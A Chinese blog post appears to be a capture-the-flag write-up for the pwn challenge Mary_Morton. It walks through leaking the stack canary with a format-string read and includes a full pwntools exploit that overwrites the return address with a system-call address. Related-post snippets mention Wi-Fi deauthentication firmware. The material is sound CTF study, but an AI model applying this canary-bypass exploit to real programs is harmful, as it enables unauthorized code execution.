攻防世界pwn--Mary_Morton

最新推荐文章于 2022-12-19 22:12:33 发布
最新推荐文章于 2022-12-19 22:12:33 发布
阅读量2.1k 收藏 1
点赞数
分类专栏: pwn ctf 文章标签: python 安全 pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/YANG12345_6/article/details/121365497
版权
ctf 同时被 2 个专栏收录
11 篇文章 0 订阅
订阅专栏
pwn
5 篇文章 0 订阅
订阅专栏

攻防世界pwn–Mary_Morton

  1. file 一下,查看文件属性
    在这里插入图片描述
  2. checksec一下,查看保护措施
    在这里插入图片描述
    ① 开了canary,在调用函数的时候会在栈上设置一个标志,标志的位置:
    在这里插入图片描述

② 开了NX,栈不可执行。

  1. 运行一下
    在这里插入图片描述

  2. ida查看其反汇编代码
    在这里插入图片描述

  3. 在ida里看到有system函数:
    在这里插入图片描述
    地址:0x4008DA

  4. gdb调试,查看格式化字符串参数的位置
    在这里插入图片描述
    这里 %p的作用:以16进制输出值
    例:
    这里我们输入的是'AAAAAAAA%p-%p-%p-%p-%p.....
    输出的是'AAAAAAAA0x..(1)..-0x.(2)...-0x.(3)...-.......-0x4141414141414141..
    这里 0x(1)表示的是输入的格式化字符串'AAAA..%p-..'后面的第一个参数的值(也就是函数原本的第二个参数,因为’AAAA..%p-..'是第函数的第一个参数。所以'AAAAAAAA'是格式化字符串的第六个参数,也就是函数的第七个参数。

  5. 查看有关栈溢出的函数:
    在这里插入图片描述

可以利用的栈溢出的buf的位置:rbp-90h,canary标志v2的位置:rbp-8h
两者相差的距离:90h-8h= 0x88,0x88/8 = (8x16+8)/8 = 17.
由于buf是格式化字符串的第6个参数,所以v2是格式化字符串的第 6+17 = 23个参数。

利用思路:首先利用格式化字符串将canary的值泄露出来,之后再次选择,利用栈溢出漏洞将canary的值和call system函数的地址写进去

exp:

# coding:UTF-8 

from pwn import*

p = process("./Mary_Morton")
#p = remote("111.200.241.244",56023)

sys_addr = 0x0004008DA

p.recvuntil("battle \n")
p.sendline("2")

p.sendline("%23$p") # canary标志点:v2,rbp-8h。buf:rbp-90h。两者相差:0x90-0x8 = 0x88 。0x88/0x8 = 17。buf是格式化字符串的第6个参数,v2则是第23个参数
p.recvuntil("0x")
canary = int(p.recv(16),16)
print(canary)

p.recvuntil("battle \n")
p.sendline("1")
payload = 'a'*0x88 + p64(canary) + 'a'*8 + p64(sys_addr)

p.sendline(payload)

p.interactive()
Y0ng.
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
XCTF-攻防世界CTF平台-PWN类——1、Mary_Morton(格式化字符串漏洞、缓冲区溢出漏洞)
Onlyone_1314的博客
09-09 1281
目录标题一级目录二级目录1、查看程序基本信息2、反编译程序3、攻击思路(1)先利用功能2格式化字符串漏洞(2)找到功能1的sub_400960()函数返回地址的位置方法二 一级目录 二级目录 1、查看程序基本信息 Mary_Morton程序,先用file查看: Linux下64位的ELF文件 再用checksec查看 程序开启了Partial RELRO、NX和Canary,没有PIE。程序开启了canary,就不能直接利用栈溢出覆盖返回地址了。因为在初始化一个栈帧时在栈底(stack overflow
攻防世界-Mary_Morton
Henlenl的博客
11-30 3004
检查文件信息 amd64-elf文件 开启了Canary保护 开启了NX保护 ida静态分析 进入到sub_4008EB函数 格式化字符串漏洞 另外进入到sub_400960()函数有栈溢出漏洞 但是有一点开启了Canary 那么我们可以通过 格式化字符串任意读 泄露Canary地址 然后利用这个地址来进行溢出漏洞的利用 栈分布如图 而我们知道 v2就是用来储存canary的值的变量 而buf 大小位0x90 v2的大小位 0x8 覆盖return addr,需要0x90-0x8=0x88大小去
攻防世界pwn——Mary_Morton
qq_62076255的博客
12-19 174
做题记录
攻防世界)(pwn)mary_mroton
PLpa的博客
07-20 842
经过一段时间的研究,终于接触到Canary了,不容易啊 拿到本题查看保护 开了NX和Canary两种栈保护,我们运行一下出现,看一下程序逻辑: 根据我们对英语强大的理解 (翻译软件的腻量)我们可以看到1标题是栈溢出漏洞函数,2是格式字符串漏洞函数,3为退出,既然他都告诉我们了,我们也不用客气直接用就可以了。 我们可以用格式字符串漏洞泄露Canary的值,然后再进行简单的栈溢出,把Canary填...
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
PWM-OUT.rar_PWN_out
09-19
"PWM-OUT.rar_PWN_out"这个压缩包文件,显然是关于如何在某种微控制器上设置和使用PWM输出的教程或代码示例。 在微控制器中,PWM的生成主要涉及到以下几个关键知识点: 1. **PWM通道**:微控制器通常有多个PWM通道...
CVE-2021-27246_Pwn2Own2020
03-03
Pwn2Own 2020东京版-TPlink漏洞利用 这是在Pwn2Own 2020 Tokyo期间用于开发TPlink Archer路由器的文件。 该漏洞的编号为CVE-2021-27246。 您可以在synacktiv网站上查看博客文章以了解详细信息。
2019XCTF攻防世界之萌新入坑(echo)
weixin_44113469的博客
04-25 536
ret2resolve exp import sys import roputils from pwn import * context.log_level = 'debug' #r = process("./pwn") p = remote("111.198.29.45",37888) rop = roputils.ROP('./echo') addr_bss = rop.sect...
攻防世界Mary_Morton wp
苗_的博客
10-13 276
首先查看他的保护机制:(checksec) 有canary保护 然后我们拖进ida发现两处溢出点: 看一下流程图和汇编可以知道readsqword这个地方有canary保护,只有 rax 和fs:28h 两个值相等的时候 才能跳转到返回值,反之则调用stack_chk_fail 找到后门函数 思路:将两个漏洞结合利用,首先利用字符串漏洞,泄露出canary的值,然后在函数要返回的时候再填回去,之后利用栈溢出,让其返回到后门函数 根据程序可以看出,v2应该就是canary的..
XCTF攻防世界高手mary_morton
weixin_45948183的博客
03-24 314
格式化字符串泄露canary,栈溢出 从函数执行就可以看出,一个格式化字符串啊漏洞,一个栈溢出漏洞 checksec了一下有canary的保护,开启了canary,就不能直接利用栈溢出覆盖返回地址,通过通过格式化字符串漏洞泄露canary的值,然后再进行栈溢出的覆盖 buf在rbp-90h,v2在rbp-8h,canary与我们输入参数的偏移为0x90 - 8 = 0x88所以,覆盖返回地址的话...
攻防世界 Mary_Morton
10-07 287
1.题目 2.IDA分析 3.流程分析
攻防世界 Pwn Mary_Morton
MrTreebook的博客
12-05 968
攻防世界 Pwn Mary_Morton1.题目下载地址2.checksec看一下保护3.IDA分析3.1.main函数3.2. sub_400960()3.3. sub_4008EB()3.4.4.gdb动态调试4.1.计算溢出量5.exp 1.题目下载地址 点击下载题目 2.checksec看一下保护 开启了canary,没开PIE 大概率有后门函数,应该不是很难的题 3.IDA分析 3.1.main函数 puts("Welcome to the battle ! "); puts("[Great
ASIS-CTF-Finals-2017 Mary_Morton
qq_41071646的博客
01-11 1282
讲道理 这个 其实 感觉有两个方法  两种方法 都要调用一下    第一个  printf函数      第一个是 我们第一个可以    用printf  然后hook掉got的printf  不知道好不好实现  自己搜索了 资料 也没有发现  第二个 就是观察栈了  。。。。。。。 这里有个保护   就是  readfsqword  在 ida 的f5看的不是很清楚 我们 看 汇编窗...
Mary_Morton write up(pwn 64位格式化字符串和栈溢出
weixin_43742794的博客
08-06 842
Morton.dms 首先用gdb(已安装peda)打开文件 用checksec检查可执行文件属性 CANNARY(栈保护) 即是否在栈中插入了cookie(linux中称为canary FORTIFY 防止缓冲区溢出攻击 不常见 NX(Windows平台上称其为DEP)即No-eXecute(不可执行)的意思,NX(DEP)的基本原理是将数据所在内存页标识为不可执行,当程序溢出成功转入she...
4.pwn入门新手做攻防世界Mary_Morton (stack canary与绕过的思路)
qiudalaojiao的博客
02-14 601
canary 通常栈溢出的利用方式是通过溢出存在于栈上的局部变量,从而让多出来的数据覆盖ebp、eip 等,从而达到劫持控制流的目的。然而stack canary这一技术的应用使得这种利用手段变得难以实 现。。这个概念应用在栈保护上则是在初始化一个栈帧时在栈底设置一个随机的canary值,栈帧销毁前 测试比较该值是否“死掉”,即是否被改变,若被改变则说明栈溢出发生,程序走另一个流程结束,以免漏洞利...
攻防世界pwn-forgot
最新发布
08-10
- *1* [攻防世界pwn题:forgot](https://blog.csdn.net/m0_62396648/article/details/125134327)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值